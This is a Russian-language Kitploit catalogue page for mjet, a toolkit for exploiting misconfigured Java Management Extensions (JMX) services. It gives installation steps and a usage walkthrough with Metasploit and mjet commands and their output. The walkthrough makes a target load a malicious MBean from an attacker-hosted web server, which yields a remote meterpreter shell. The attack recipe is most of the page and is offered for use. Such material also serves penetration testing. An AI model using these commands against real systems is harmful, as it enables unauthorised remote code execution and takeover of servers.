Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
mjet — Mogwai — инструментарий для эксплуатации Java Management Extensions (JMX) | Kitploit
Инструменты/GitHubGitHub/mogwaisec/mjet
Фреймворки для эксплойтовГенерация полезной нагрузкиЭксплуатацияТестирование на ПроникновениеНеправильная КонфигурацияRed Teaming
GitHubmogwaisec/mjet

mjet

Mogwai — инструментарий для эксплуатации Java Management Extensions (JMX)

Репозиторий
1743110 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

mjet

Mogwai Security Java Management Extensions (JMX) Exploitation Toolkit

mjet — это инструмент, который можно использовать для защиты некорректно сконфигурированных JMX-сервисов. Он основан на статье «Exploiting JMX-RMI» Брейдена Томаса/Accuvant «http://www.accuvant.com/blog/exploiting-jmx-rmi» и может использоваться для выполнения произвольных Metasploit-пейлоадов на целевой системе.

Изначально Mjet планировался как полноценный набор атакующих инструментов, однако мы заметили, что в репозитории Metasploit на Github есть pull request, который добавит базовую поддержку Java RMI/сериализации на нативном Ruby. Это потрясающе и устраняет зависимость от Java. Поэтому мы прекратили разработку этого инструмента и в ближайшем будущем создадим модули для Metasploit.

mjet состоит из следующих частей:

  • Модуль Metasploit, эмулирующий «mlet Server». По сути, это веб-сервер, который раздаёт HTML-файл, содержащий тег mlet
  • ManagedBean, изменяемый модулем mlet-сервера для включения выбранного пейлоада
  • Jar-архив, используемый для связи с незащищённым JMX-сервисом.

Установка (с github-версией Metasploit)

  • Скопируйте папку «MBean» в «data/java/metasploit»
  • Скопируйте java_mlet_server.rb в «modules/exploits/multi/misc/»

Использование

В примере используются следующие системы: атакующий: 192.168.178.1 цель: 192.168.178.200, JMX-сервис работает на TCP-порту 1616

  • Настройте/запустите модуль Metasploit «java_mlet_server». Модуль будет работать как фоновая задача.
root@kitploit:~
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run

Используйте mjet.jar для подключения к уязвимому JMX-сервису и укажите URL веб-сервера MLet...

root@kitploit:~
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------

[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164  5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done

и наслаждайтесь своей meterpreter-оболочкой :-)

Скачать инструмент